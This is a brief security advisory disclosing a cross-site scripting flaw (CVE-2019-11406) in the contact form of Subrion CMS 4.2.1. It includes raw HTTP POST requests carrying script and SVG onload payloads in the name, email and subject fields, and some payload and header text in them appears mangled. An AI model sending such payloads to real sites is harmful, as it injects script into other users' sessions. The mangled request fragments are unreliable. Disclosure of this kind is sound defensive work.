Description
Title: [Subrion CMS- 4.2.1 XSS]
Date: [12-04-2019]
[Vulnerability Type]
Cross Site Scripting (XSS)
Version: [4.2.1]
Tested on:
[Windows,FireFox]
[Affected Product Code Base]
Subrion CMS - 4.2.1
[Affected Component]
parameter: name.
parameter: email.
parameter: phone.
In contact pagePoC:
POST /_core/en/contacts/ HTTP/1.1
Host: demos.subrion.org
Cookie: INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2; INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2
Upgrade-Insecure-Requests: 1
__st=049b3a26a3737a49eea271c39bced75a&name=%22%3E%3Cscript%3Ealert%28test%29%3C%2Fscript%3E%22%3E&email='"--><Svg OnLoad=confirmK>&phone=&subject='"--><Svg OnLoad=confirmK>&msg=&security_code=
[Impact Code execution]
true
[Attack Vectors]
POST /_core/en/contacts/ HTTP/1.1
Host: demos.subrion.org
Cookie: INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2; INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2__st=049b3a26a3737a49eea271c39bced75a&name=%22%3E%3Cscript%3Ealert%28test%29%3C%2Fscript%3E%22%3E&email='"--><Svg OnLoad=confirm
K>&phone=&subject='"--><Svg OnLoad=confirmK>&msg=&security_code=
Author: [Mohammed Alorf - twitter:@_oww]
CVE-2019-11406.